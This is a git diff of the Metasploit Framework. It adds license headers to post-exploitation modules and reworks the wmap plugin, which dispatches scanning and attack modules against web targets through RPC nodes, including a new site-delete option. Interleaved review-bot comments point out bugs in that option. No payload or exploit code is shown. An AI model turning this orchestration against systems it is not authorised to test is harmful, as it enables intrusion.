+# http://metasploit.com/
+##
+
 # nbd_server.rb
 #
 # Maps remote disks and logical volumes to a local Network Block Device
diff --git a/modules/post/windows/manage/mssql_local_auth_bypass.rb b/modules/post/windows/manage/mssql_local_auth_bypass.rb
index 3c31c1d15d..f53d77482c 100644
--- a/modules/post/windows/manage/mssql_local_auth_bypass.rb
+++ b/modules/post/windows/manage/mssql_local_auth_bypass.rb
@@ -1,3 +1,10 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
 require 'msf/core'
 require 'rex'
 require 'msf/core/post/common'
diff --git a/modules/post/windows/manage/nbd_server.rb b/modules/post/windows/manage/nbd_server.rb
index a41765f305..a32633e5e4 100644
--- a/modules/post/windows/manage/nbd_server.rb
+++ b/modules/post/windows/manage/nbd_server.rb
@@ -1,3 +1,10 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
 #
 # Maps remote disks and logical volumes to a local Network Block Device
 # server. Allows for forensic tools to be executed on the remote disk
diff --git a/modules/post/windows/manage/powershell/exec_powershell.rb b/modules/post/windows/manage/powershell/exec_powershell.rb
index 59bc7cccff..c3e08ceb23 100644
--- a/modules/post/windows/manage/powershell/exec_powershell.rb
+++ b/modules/post/windows/manage/powershell/exec_powershell.rb
@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# http://metasploit.com/framework/
 ##

 ##
diff --git a/modules/post/windows/manage/rpcapd_start.rb b/modules/post/windows/manage/rpcapd_start.rb
index 1ca074b90c..a29279ad31 100644
--- a/modules/post/windows/manage/rpcapd_start.rb
+++ b/modules/post/windows/manage/rpcapd_start.rb
@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
+# http://metasploit.com/framework/
 ##

 require 'msf/core'
diff --git a/modules/post/windows/manage/sdel.rb b/modules/post/windows/manage/sdel.rb
index 50e737e76b..a090d9bf50 100644
--- a/modules/post/windows/manage/sdel.rb
+++ b/modules/post/windows/manage/sdel.rb
@@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/plugins/wmap.rb b/plugins/wmap.rb index dd0172c5f1..77f5de94c4 100644 --- a/plugins/wmap.rb +++ b/plugins/wmap.rb @@ -15,16 +15,16 @@ module Msf class Plugin::Wmap < Msf::Plugin class WmapCommandDispatcher - attr_accessor :wmapmodules # Enabled Wmap modules + attr_accessor :wmapmodules # Enabled Wmap modules attr_accessor :targets # Targets - attr_accessor :lastsites # Temp location of previously obtained sites + attr_accessor :lastsites # Temp location of previously obtained sites attr_accessor :rpcarr # Array or rpc connections - attr_accessor :njobs # Max number of jobs + attr_accessor :njobs # Max number of jobs attr_accessor :nmaxdisplay # Flag to stop displaying the same mesg attr_accessor :runlocal # Flag to run local modules only attr_accessor :masstop # Flag to stop everything attr_accessor :killwhenstop # Kill process when exiting - + include Msf::Ui::Console::CommandDispatcher def name @@ -44,7 +44,7 @@ class Plugin::Wmap < Msf::Plugin "wmap_vulns" => "Display web vulns", } end - + def cmd_wmap_vulns(*args) args.push("-h") if args.length == 0 @@ -67,7 +67,7 @@ class Plugin::Wmap < Msf::Plugin end end - + def cmd_wmap_modules(*args) args.push("-h") if args.length == 0 @@ -100,7 +100,7 @@ class Plugin::Wmap < Msf::Plugin while (arg = args.shift) case arg when '-c' - self.targets = Hash.new() + self.targets = Hash.new() when '-l' view_targets return 
@@ -112,7 +112,7 @@ class Plugin::Wmap < Msf::Plugin print_status("Usage: wmap_targets [options]") print_line("\t-h Display this help text") print_line("\t-t [urls] Define target sites (vhost1,url[space]vhost2,url) ") - print_line("\t-d [ids] Define target sites (id1, id2, id3 ...)") + print_line("\t-d [ids] Define target sites (id1, id2, id3 ...)") print_line("\t-c Clean target sites list") print_line("\t-l List all target sites") @@ -137,6 +137,13 @@ class Plugin::Wmap < Msf::Plugin else print_error("Unable to create site") end + when '-d' + del_idx = args.shift + if del_idx + delete_site(del_idx.to_i) + else + print_error("Provide index of site to delete") + end when '-l' view_sites return @@ -148,7 +155,7 @@ class Plugin::Wmap < Msf::Plugin if not u return end - + if l == nil or l.empty? l = 200 s = true @@ -156,25 +163,25 @@ class Plugin::Wmap < Msf::Plugin l = l.to_i s = false end - + if u.include? 'http' # Parameters are in url form view_site_tree(u,l,s) else - # Parameters are digits - if !self.lastsites or self.lastsites.length == 0 + # Parameters are digits + if !self.lastsites or self.lastsites.length == 0 view_sites print_status ("Web sites ids. referenced from previous table.") end - + target_whitelist = [] ids = u.to_s.split(/,/) ids.each do |id| next if id.to_s.strip.empty? - + if id.to_i > self.lastsites.length - print_error("Skipping id #{id}...") + print_error("Skipping id #{id}...") else target_whitelist << self.lastsites[id.to_i] #print_status("Loading #{self.lastsites[id.to_i]}.") 
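Review bot: The new `when '-d'` branch in the `@@ -137,6 +137,13 @@` hunk of plugins/wmap.rb passes `del_idx.to_i` to `delete_site`, and `String#to_i` returns 0 for any non-numeric argument, so a typo such as `wmap_sites -d foo` is treated as a request to delete index 0 instead of being rejected. Validate before converting by replacing `if del_idx` with `if del_idx =~ /\A\d+\z/`, which sends everything else to the existing `print_error("Provide index of site to delete")`. `delete_site` is not defined in the visible hunks, so whether it bounds-checks the index or confirms which site was removed cannot be verified from here. The enclosing argument loop starts and ends outside this hunk.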
@@ -185,18 +192,19 @@ class Plugin::Wmap < Msf::Plugin return if target_whitelist.length == 0 if not self.targets - self.targets = Hash.new() + self.targets = Hash.new() end target_whitelist.each do |ent| view_site_tree(ent,l,s) - end + end end return when '-h' print_status("Usage: wmap_sites [options]") print_line("\t-h Display this help text") print_line("\t-a [url] Add site (vhost,url)") + print_line("\t-d [id] Delete site") print_line("\t-l List all available sites") print_line("\t-s [id] Display site structure (vhost,url|ids) (level)") @@ -210,11 +218,11 @@ class Plugin::Wmap < Msf::Plugin end def cmd_wmap_nodes(*args) - + if not self.rpcarr - self.rpcarr=Hash.new() + self.rpcarr=Hash.new() end - + args.push("-h") if args.length == 0 while (arg = args.shift) @@ -225,7 +233,7 @@ class Plugin::Wmap < Msf::Plugin s = args.shift u = args.shift p = args.shift - + res = rpc_add_node(h,r,s,u,p,false) if res print_status("Node created.") @@ -234,20 +242,20 @@ class Plugin::Wmap < Msf::Plugin end when '-c' idref = args.shift - + if not idref print_error("No id defined") return end if idref.upcase == 'ALL' print_status("All nodes removed") - self.rpcarr = Hash.new() + self.rpcarr = Hash.new() else idx=0 self.rpcarr.each do |k,v| if idx == idref.to_i self.rpcarr.delete(k) - print_status("Node deleted #{k}") + print_status("Node deleted #{k}") end idx += 1 end @@ -258,24 +266,24 @@ class Plugin::Wmap < Msf::Plugin user = args.shift pass = args.shift dbname = args.shift - + res = rpc_db_nodes(host,port,user,pass,dbname) if res print_status("OK.") else print_error("Error") - end + end when '-l' rpc_list_nodes return when '-j' rpc_view_jobs - return + return when '-k' node = args.shift jid = args.shift rpc_kill_node(node,jid) - return + return when '-h' print_status("Usage: wmap_nodes [options]") print_line("\t-h Display this help text") 
@@ -285,7 +293,7 @@ class Plugin::Wmap < Msf::Plugin print_line("\t-j View detailed jobs") print_line("\t-k ALL|id ALL|job_id Kill jobs on node") print_line("\t-l List all current nodes") - + print_line("") return else @@ -299,8 +307,8 @@ class Plugin::Wmap < Msf::Plugin # Stop everything self.masstop = false self.killwhenstop = true - - trap("INT") { + + trap("INT") { print_error("Stopping execution...") self.masstop = true if self.killwhenstop @@ -308,12 +316,12 @@ class Plugin::Wmap < Msf::Plugin end return } - + # Max numbers of concurrent jobs per node self.njobs = 25 self.nmaxdisplay = false self.runlocal = false - + # Formating sizeline = 60 @@ -334,11 +342,11 @@ class Plugin::Wmap < Msf::Plugin moduleverbose = false showprogress = false - + if not self.rpcarr - self.rpcarr = Hash.new() + self.rpcarr = Hash.new() end - + if not run_wmap_ssl print_status("Loading of wmap ssl modules disabled.") end @@ -365,7 +373,7 @@ class Plugin::Wmap < Msf::Plugin using_p = false using_m = false usinginipath = false - + mname = '' inipathname = '/' @@ -418,7 +426,7 @@ class Plugin::Wmap < Msf::Plugin if inipathname print_status("Using initial path #{inipathname}.") end - usinginipath = true + usinginipath = true when '-h' print_status("Usage: wmap_run [options]") @@ -431,16 +439,16 @@ class Plugin::Wmap < Msf::Plugin print_line("") return else - print_error("Unknown flag") + print_error("Unknown flag") return end end - + if (self.rpcarr.length == 0) and (mode & wmap_show == 0) print_error("NO WMAP NODES DEFINED. Executing local modules") self.runlocal = true end - + if self.targets == nil print_error("Targets have not been selected.") return @@ -450,14 +458,14 @@ class Plugin::Wmap < Msf::Plugin print_error("Targets have not been selected.") return end - + execmod = true if (mode & wmap_show != 0) execmod = false end self.targets.each_with_index do |t, idx| - + selected_host = t[1][:host] selected_port = t[1][:port] selected_ssl = t[1][:ssl] 
@@ -475,27 +483,27 @@ class Plugin::Wmap < Msf::Plugin end # wmap_dir, wmap_file - matches = Hash.new() + matches = Hash.new() # wmap_server - matches1 = Hash.new() + matches1 = Hash.new() # wmap_query - matches2 = Hash.new() + matches2 = Hash.new() # wmap_ssl - matches3 = Hash.new() + matches3 = Hash.new() # wmap_unique_query - matches5 = Hash.new() + matches5 = Hash.new() # wmap_generic - matches10 = Hash.new() + matches10 = Hash.new() # OPTIONS opt_str = nil jobify = false - + # This will be clean later load_wmap_modules(false) @@ -523,7 +531,7 @@ class Plugin::Wmap < Msf::Plugin end when :wmap_ssl if run_wmap_ssl - matches3[w]=true + matches3[w]=true end else # Black Hole @@ -537,7 +545,7 @@ class Plugin::Wmap < Msf::Plugin matches3 = sort_by_orderid(matches3) matches5 = sort_by_orderid(matches5) matches10 = sort_by_orderid(matches10) - + # # Handle modules that need to be run before all tests IF SERVER is SSL, once usually again the SSL web server. # :wmap_ssl @@ -556,20 +564,20 @@ class Plugin::Wmap < Msf::Plugin print_error("STOPPED.") return end - - # Module not part of profile or not match - if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) + + # Module not part of profile or not match + if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) idx += 1 begin # Module options hash - modopts = Hash.new() - + modopts = Hash.new() + # # The code is just a proof-of-concept and will be expanded in the future # print_status "Module #{xref[0]}" - + if (mode & wmap_expl != 0) # 
@@ -591,14 +599,14 @@ class Plugin::Wmap < Msf::Plugin modopts['VERBOSE'] = moduleverbose modopts['ShowProgress'] = showprogress modopts['RunAsJob'] = jobify - + begin if execmod rpcnode = rpc_round_exec(xref[0],xref[1], modopts, self.njobs) end rescue ::Exception print_status(" >> Exception during launch from #{xref[0]}: #{$!}") - end + end end rescue ::Exception @@ -616,26 +624,26 @@ class Plugin::Wmap < Msf::Plugin idx = 0 matches1.each_key do |xref| - + if self.masstop print_error("STOPPED.") return end - - # Module not part of profile or not match - if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) + + # Module not part of profile or not match + if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) idx += 1 - + begin # Module options hash - modopts = Hash.new() + modopts = Hash.new() # # The code is just a proof-of-concept and will be expanded in the future # - + print_status "Module #{xref[0]}" - + if (mode & wmap_expl != 0) # @@ -657,20 +665,20 @@ class Plugin::Wmap < Msf::Plugin modopts['VERBOSE'] = moduleverbose modopts['ShowProgress'] = showprogress modopts['RunAsJob'] = jobify - + begin if execmod rpcnode = rpc_round_exec(xref[0],xref[1], modopts, self.njobs) end rescue ::Exception print_status(" >> Exception during launch from #{xref[0]}: #{$!}") - end + end end rescue ::Exception print_status(" >> Exception from #{xref[0]}: #{$!}") end - end + end end # 
@@ -682,26 +690,26 @@ class Plugin::Wmap < Msf::Plugin idx = 0 matches.each_key do |xref| - + if self.masstop print_error("STOPPED.") return end - - # Module not part of profile or not match - if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) + + # Module not part of profile or not match + if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) idx+=1 begin # Module options hash - modopts = Hash.new() + modopts = Hash.new() # # The code is just a proof-of-concept and will be expanded in the future # - + print_status "Module #{xref[0]}" - + if (mode & wmap_expl != 0) # # For modules to have access to the global datastore @@ -722,7 +730,7 @@ class Plugin::Wmap < Msf::Plugin modopts['VERBOSE'] = moduleverbose modopts['ShowProgress'] = showprogress modopts['RunAsJob'] = jobify - + # # Run the plugins that only need to be # launched once. @@ -741,7 +749,7 @@ class Plugin::Wmap < Msf::Plugin print_error("STOPPED.") return end - + p = node.current_path testpath = Pathname.new(p) strpath = testpath.cleanpath(false).to_s @@ -785,7 +793,7 @@ class Plugin::Wmap < Msf::Plugin end if not strpath.match(excludefilestr) - if (not usinginipath) or (usinginipath and strpath.match(inipathname)) + if (not usinginipath) or (usinginipath and strpath.match(inipathname)) modopts['PATH'] = strpath print_status("Path: #{strpath}") @@ -795,14 +803,14 @@ class Plugin::Wmap < Msf::Plugin end rescue ::Exception print_status(" >> Exception during launch from #{xref[0]}: #{$!}") - end + end end end end when :wmap_dir if (node.is_leaf? and not strpath.include? ".") or node.is_root? or not node.is_leaf? - if (not usinginipath) or (usinginipath and strpath.match(inipathname)) - + if (not usinginipath) or (usinginipath and strpath.match(inipathname)) + modopts['PATH'] = strpath print_status("Path: #{strpath}") 
@@ -821,7 +829,7 @@ class Plugin::Wmap < Msf::Plugin rescue ::Exception print_status(" >> Exception from #{xref[0]}: #{$!}") end - end + end end # @@ -833,26 +841,26 @@ class Plugin::Wmap < Msf::Plugin idx = 0 matches5.each_key do |xref| - + if self.masstop print_error("STOPPED.") return end - - # Module not part of profile or not match - if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) + + # Module not part of profile or not match + if ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) idx += 1 begin # Module options hash - modopts = Hash.new() + modopts = Hash.new() # # The code is just a proof-of-concept and will be expanded in the future # - + print_status "Module #{xref[0]}" - + if (mode & wmap_expl != 0) # # For modules to have access to the global datastore @@ -874,25 +882,25 @@ class Plugin::Wmap < Msf::Plugin modopts['VERBOSE'] = moduleverbose modopts['ShowProgress'] = showprogress modopts['RunAsJob'] = jobify - + # # Run the plugins for each request that have a distinct # GET/POST URI QUERY string. # - utest_query = Hash.new() + utest_query = Hash.new() h = self.framework.db.workspace.hosts.find_by_address(selected_host) s = h.services.find_by_port(selected_port) w = s.web_sites.find_by_vhost(selected_vhost) w.web_forms.each do |form| - + if self.masstop print_error("STOPPED.") return end - + # # Only test unique query strings by comparing signature to previous tested signatures 'path,p1,p2,pn' # 
@@ -909,18 +917,18 @@ class Plugin::Wmap < Msf::Plugin form.params.each do |p| pn, pv, pt = p if pn - if not pn.empty? + if not pn.empty? if not pv or pv.empty? #TODO add value based on param name pv = "aaa" end - + #temparr << pn.to_s + "=" + Rex::Text.uri_encode(pv.to_s) temparr << pn.to_s + "=" + pv.to_s end else - print_error("Blank parameter name. Form #{form.path}") - end + print_error("Blank parameter name. Form #{form.path}") + end end datastr = temparr.join("&") if (temparr and not temparr.empty?) @@ -935,15 +943,15 @@ class Plugin::Wmap < Msf::Plugin modopts['DATA'] = "" end if form.method.upcase == 'POST' - modopts['DATA'] = datastr + modopts['DATA'] = datastr end modopts['TYPES'] = typestr # # TODO: Add headers, etc. # - if (not usinginipath) or (usinginipath and form.path.match(inipathname)) - + if (not usinginipath) or (usinginipath and form.path.match(inipathname)) + print_status "Path #{form.path}" #print_status("Unique PATH #{modopts['PATH']}") #print_status("Unique GET #{modopts['QUERY']}") @@ -953,7 +961,7 @@ class Plugin::Wmap < Msf::Plugin begin if execmod rpcnode = rpc_round_exec(xref[0],xref[1], modopts, self.njobs) - end + end utest_query[signature(form.path,datastr)]=1 rescue ::Exception print_status(" >> Exception during launch from #{xref[0]}: #{$!}") 
@@ -982,26 +990,26 @@ class Plugin::Wmap < Msf::Plugin idx = 0 matches2.each_key do |xref| - + if self.masstop print_error("STOPPED.") return end - - # Module not part of profile or not match - if not ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) + + # Module not part of profile or not match + if not ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) idx += 1 begin # Module options hash - modopts = Hash.new() + modopts = Hash.new() # # The code is just a proof-of-concept and will be expanded in the future # - + print_status "Module #{xref[0]}" - + if (mode & wmap_expl != 0) # @@ -1015,7 +1023,7 @@ class Plugin::Wmap < Msf::Plugin # # Parameters passed in hash xref # - + modopts['RHOST'] = selected_host modopts['RHOSTS'] = selected_host modopts['RPORT'] = selected_port.to_s @@ -1024,7 +1032,7 @@ class Plugin::Wmap < Msf::Plugin modopts['VERBOSE'] = moduleverbose modopts['ShowProgress'] = showprogress modopts['RunAsJob'] = jobify - + # # Run the plugins for each request that have a distinct # GET/POST URI QUERY string. @@ -1035,7 +1043,7 @@ class Plugin::Wmap < Msf::Plugin w = s.web_sites.find_by_vhost(selected_vhost) w.web_forms.each do |req| - + if self.masstop print_error("STOPPED.") return @@ -1049,7 +1057,7 @@ class Plugin::Wmap < Msf::Plugin req.params.each do |p| pn, pv, pt = p if pn - if not pn.empty? + if not pn.empty? if not pv or pv.empty? #TODO add value based on param name pv = "aaa" @@ -1058,8 +1066,8 @@ class Plugin::Wmap < Msf::Plugin temparr << pn.to_s + "=" + pv.to_s end else - print_error("Blank parameter name. Form #{req.path}") - end + print_error("Blank parameter name. Form #{req.path}") + end end datastr = temparr.join("&") if (temparr and not temparr.empty?) 
@@ -1076,8 +1084,8 @@ class Plugin::Wmap < Msf::Plugin # # TODO: Add method, headers, etc. # - if (not usinginipath) or (usinginipath and req.path.match(inipathname)) - + if (not usinginipath) or (usinginipath and req.path.match(inipathname)) + print_status "Path #{req.path}" #print_status("Query PATH #{modopts['PATH']}") #print_status("Query GET #{modopts['QUERY']}") @@ -1091,14 +1099,14 @@ class Plugin::Wmap < Msf::Plugin rescue ::Exception print_status(" >> Exception during launch from #{xref[0]}: #{$!}") end - end + end end end rescue ::Exception print_status(" >> Exception from #{xref[0]}: #{$!}") end - end + end end # @@ -1112,27 +1120,27 @@ class Plugin::Wmap < Msf::Plugin idx = 0 matches10.each_key do |xref| - + if self.masstop print_error("STOPPED.") return end - - # Module not part of profile or not match - if not ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) + + # Module not part of profile or not match + if not ( using_p and eprofile.include? xref[0].split('/').last ) or (using_m and xref[0].to_s.match(mname)) or (not using_m and not using_p) idx += 1 begin # Module options hash - modopts = Hash.new() + modopts = Hash.new() # # The code is just a proof-of-concept and will be expanded in the future # - + print_status "Module #{xref[0]}" - + if (mode & wmap_expl != 0) # @@ -1146,7 +1154,7 @@ class Plugin::Wmap < Msf::Plugin # # Parameters passed in hash xref # - + modopts['RHOST'] = selected_host modopts['RHOSTS'] = selected_host modopts['RPORT'] = selected_port.to_s @@ -1155,7 +1163,7 @@ class Plugin::Wmap < Msf::Plugin modopts['VERBOSE'] = moduleverbose modopts['ShowProgress'] = showprogress modopts['RunAsJob'] = jobify - + # # Run the plugins that only need to be # launched once. 
@@ -1167,30 +1175,30 @@ class Plugin::Wmap < Msf::Plugin end rescue ::Exception print_status(" >> Exception during launch from #{xref[0]}: #{$!}") - end + end end rescue ::Exception print_status(" >> Exception from #{xref[0]}: #{$!}") end - end + end end - + if (mode & wmap_expl != 0) print_line "+" * sizeline - - if not self.runlocal + + if not self.runlocal if execmod rpc_list_nodes() print_status("Note: Use wmap_nodes -l to list node status for completion") end end - + print_line("Launch completed in #{(Time.now.to_f - stamp)} seconds.") print_line "+" * sizeline end - + print_status("Done.") end @@ -1225,10 +1233,29 @@ class Plugin::Wmap < Msf::Plugin print_status tbl.to_s + "\n" end + def delete_site(wmap_index) + print_status("Deleting site #{wmap_index}") + idx = 0 + self.framework.db.hosts.each do |bdhost| + bdhost.services.each do |serv| + serv.web_sites.each do |web| + if idx == wmap_index + web.delete + print_status("Deleted #{web.vhost} on #{bdhost.address} at index #{idx}") + return + else + idx += 1 + end + end + end + end + end + + def view_sites # Clean temporary sites list self.lastsites = [] - + indent = ' ' tbl = Rex::Ui::Text::Table.new( @@ -1253,13 +1280,13 @@ class Plugin::Wmap < Msf::Plugin f = web.web_forms.count tbl << [ idx.to_s, bdhost.address, web.vhost, serv.port, serv.name, c.to_s, f.to_s ] idx += 1 - + turl = web.vhost + "," + serv.name + "://" +bdhost.address.to_s + ":" + serv.port.to_s + "/" - self.lastsites << turl + self.lastsites << turl end end end - + print_status tbl.to_s + "\n" end @@ -1317,9 +1344,9 @@ class Plugin::Wmap < Msf::Plugin def process_urls(urlstr) target_whitelist = [] - + urls = urlstr.to_s.split(/\s+/) - + urls.each do |url| next if url.to_s.strip.empty? @@ -1361,8 +1388,8 @@ class Plugin::Wmap < Msf::Plugin if not self.targets # First time targets are defined - self.targets = Hash.new() - end + self.targets = Hash.new() + end target_whitelist.each do |ent| vhost,target = ent 
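Review bot: `delete_site`, added in the `@@ -1225,10 +1233,29 @@` hunk, reports nothing when `wmap_index` is past the last site: the loops simply finish after "Deleting site N" has been printed. Add `print_error("No site at index #{wmap_index}")` after the outer `each` so a failed delete is visible. `web.delete` looks like the ActiveRecord call that skips callbacks and dependent-association cleanup, so forms and vulns attached to the site may be left orphaned unless the schema cascades; `web.destroy` is probably what is wanted, to be confirmed against the data models. The index is also recounted over `framework.db.hosts` at delete time, so it matches what the operator saw only if the site listing enumerates the same records in the same order; worth a comment on the method, or resolving the id through `lastsites` as the target selection does.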
@@ -1387,12 +1414,12 @@ class Plugin::Wmap < Msf::Plugin # Initial defaul path inipath = target.path if target.path.empty? - inipath = '/' + inipath = '/' end - + #site.web_forms.find_all_by_path(target.path).each do |form| ckey = [ site.vhost, host.address, serv.port, inipath].join("|") - + if not self.targets[ckey] self.targets[ckey] = WebTarget.new self.targets[ckey].merge!({ @@ -1404,7 +1431,7 @@ class Plugin::Wmap < Msf::Plugin }) #self.targets[ckey][inipath] = [] else - print_status("Target already set in targets list.") + print_status("Target already set in targets list.") end # Store the form object in the hash for this path @@ -1415,23 +1442,23 @@ class Plugin::Wmap < Msf::Plugin end # Code by hdm. Modified two lines by et - # lastsites contains a temporary array with vhost,url strings so the id can be - # referenced in the array and prevent new sites added in the db to corrupt previous id list. + # lastsites contains a temporary array with vhost,url strings so the id can be + # referenced in the array and prevent new sites added in the db to corrupt previous id list. def process_ids(idsstr) - if !self.lastsites or self.lastsites.length == 0 + if !self.lastsites or self.lastsites.length == 0 view_sites print_status ("Web sites ids. referenced from previous table.") end - + target_whitelist = [] ids = idsstr.to_s.split(/,/) ids.each do |id| next if id.to_s.strip.empty? - + if id.to_i > self.lastsites.length - print_error("Skipping id #{id}...") + print_error("Skipping id #{id}...") else target_whitelist << self.lastsites[id.to_i] print_status("Loading #{self.lastsites[id.to_i]}.") 
@@ -1442,21 +1469,21 @@ class Plugin::Wmap < Msf::Plugin return if target_whitelist.length == 0 if not self.targets - self.targets = Hash.new() + self.targets = Hash.new() end target_whitelist.each do |ent| process_urls(ent) - end + end end - + def view_site_tree(urlstr, md, ld) - if not urlstr + if not urlstr return end site_whitelist = [] - + urls = urlstr.to_s.split(/\s+/) urls.each do |url| @@ -1498,7 +1525,7 @@ class Plugin::Wmap < Msf::Plugin # Skip the DB entirely if no matches return if site_whitelist.length == 0 - vsites = Hash.new() + vsites = Hash.new() site_whitelist.each do |ent| vhost,target = ent @@ -1514,7 +1541,7 @@ class Plugin::Wmap < Msf::Plugin next end - sites = serv.web_sites.where('vhost = ? and service_id = ?', vhost, serv.id) + sites = serv.web_sites.where('vhost = ? and service_id = ?', vhost, serv.id) sites.each do |site| t = load_tree(site) @@ -1588,10 +1615,10 @@ class Plugin::Wmap < Msf::Plugin tree.children.each_pair do |name,child| print_tree(child,ip,maxlevel,limitlevel) end - + end end - + def signature(fpath,fquery) hsig = Hash.new() @@ -1617,13 +1644,13 @@ class Plugin::Wmap < Msf::Plugin end params end - + def rpc_add_node(host,port,ssl,user,pass,bypass_exist) if not self.rpcarr - self.rpcarr = Hash.new() + self.rpcarr = Hash.new() end - + begin istr = "#{host}|#{port}|#{ssl}|#{user}|#{pass}" if self.rpcarr.has_key?(istr) and not bypass_exist and self.rpcarr[istr] != nil 
@@ -1639,37 +1666,37 @@ class Plugin::Wmap < Msf::Plugin print_error "Unable to connect" #raise ConnectionError return - end - + end + res = temprpc.login( user , pass) - - if not res + + if not res print_error("Unable to authenticate to #{host}:#{port}.") return else res = temprpc.call('core.version') end - - print_status("Connected to #{host}:#{port} [#{res['version']}].") + + print_status("Connected to #{host}:#{port} [#{res['version']}].") self.rpcarr[istr] = temprpc end rescue print_error("Unable to connect") end end - + def local_module_exec(mod,mtype, opts, nmaxjobs) jobify = false - + modinst = framework.modules.create(mod) if(not modinst) print_error("Unknown module") return end - + sess = nil - + case mtype when 'auxiliary' Msf::Simple::Auxiliary.run_simple(modinst, { @@ -1693,42 +1720,42 @@ class Plugin::Wmap < Msf::Plugin else print_error("Wrong mtype.") end - + if sess if (jobify == false and sess.interactive?) print_line driver.run_single("sessions -q -i #{sess.sid}") - else + else print_status("Session #{sess.sid} created in the background.") end end end - + def rpc_round_exec(mod,mtype, opts, nmaxjobs) - + res = nil idx = 0 - - if active_rpc_nodes == 0 + + if active_rpc_nodes == 0 if not self.runlocal - print_error("All active nodes not working or removed") - return + print_error("All active nodes not working or removed") + return end res = true else rpc_reconnect_nodes() end - + if self.masstop return end - + while not res if active_rpc_nodes == 0 print_error("All active nodes not working or removed") - return + return end - + #find the node with less jobs load. minjobs = nmaxjobs minconn = nil 
@@ -1736,15 +1763,15 @@ class Plugin::Wmap < Msf::Plugin self.rpcarr.each do |k,rpccon| if not rpccon print_error("Skipping inactive node #{nid} #{k}") - else + else begin currentjobs = rpccon.call('job.list').length - + if currentjobs < minjobs minconn = rpccon minjobs = currentjobs end - + if currentjobs == nmaxjobs if self.nmaxdisplay == false print_error("Node #{nid} reached max number of jobs #{nmaxjobs}") @@ -1756,57 +1783,57 @@ class Plugin::Wmap < Msf::Plugin rescue print_error("Unable to connect. Node #{tarr[0]}:#{tarr[1]}") self.rpcarr[k]=nil - - if active_rpc_nodes == 0 + + if active_rpc_nodes == 0 print_error("All active nodes ,not working or removed") return else - print_error("Sending job to next node") + print_error("Sending job to next node") next - end + end end end - nid += 1 + nid += 1 end if minjobs < nmaxjobs res=minconn.call('module.execute', mtype, mod, opts) self.nmaxdisplay = false #print_status(">>>#{res} #{mod}") - + if res if res.has_key?("job_id") return else - print_error("Unable to execute module in node #{k} #{res}") + print_error("Unable to execute module in node #{k} #{res}") end end else - #print_status("Max number of jobs #{nmaxjobs} reached in node #{k}") + #print_status("Max number of jobs #{nmaxjobs} reached in node #{k}") end - + idx += 1 end - - if self.runlocal and not self.masstop + + if self.runlocal and not self.masstop local_module_exec(mod,mtype, opts, nmaxjobs) end end - + def rpc_db_nodes(host,port,user,pass,name) - rpc_reconnect_nodes() - + rpc_reconnect_nodes() + if active_rpc_nodes == 0 print_error("No active nodes at this time") return end - - self.rpcarr.each do |k,v| + + self.rpcarr.each do |k,v| if v res = v.call('db.driver',{:driver => 'postgresql'}) res = v.call('db.connect',{:database => name, :host => host, :port => port, :username => user, :password => pass}) res = v.call('db.status') - + if res['db'] == name print_status("db_connect #{res} #{host}:#{port} OK") else 
@@ -1814,14 +1841,14 @@ class Plugin::Wmap < Msf::Plugin end else print_error("No connection to node #{k}") - end + end end end - + def rpc_reconnect_nodes() begin # Sucky 5 mins token timeout. - + idx = nil self.rpcarr.each do |k,rpccon| if rpccon @@ -1830,11 +1857,11 @@ class Plugin::Wmap < Msf::Plugin currentjobs = rpccon.call('job.list').length rescue tarr = k.split("|") - rflag = false - + rflag = false + res = rpccon.login(tarr[3],tarr[4]) - - if res + + if res rflag = true print_error("Reauth to node #{tarr[0]}:#{tarr[1]}") break @@ -1842,7 +1869,7 @@ class Plugin::Wmap < Msf::Plugin raise ConnectionError end end - end + end end rescue print_error("ERROR CONNECTING TO NODE. Disabling #{idx} use wmap_nodes -a to reconnect") @@ -1853,31 +1880,31 @@ class Plugin::Wmap < Msf::Plugin else #blah end - end + end end - + def rpc_kill_node(i,j) - + if not i print_error("Nodes not defined") return end - + if not j print_error("Node jobs defined") return end - + rpc_reconnect_nodes() - + if active_rpc_nodes == 0 print_error("No active nodes at this time") return end - + idx=0 self.rpcarr.each do |k,rpccon| - if idx == i.to_i or i.upcase == 'ALL' + if idx == i.to_i or i.upcase == 'ALL' #begin if not rpccon print_error("No connection to node #{idx}") 
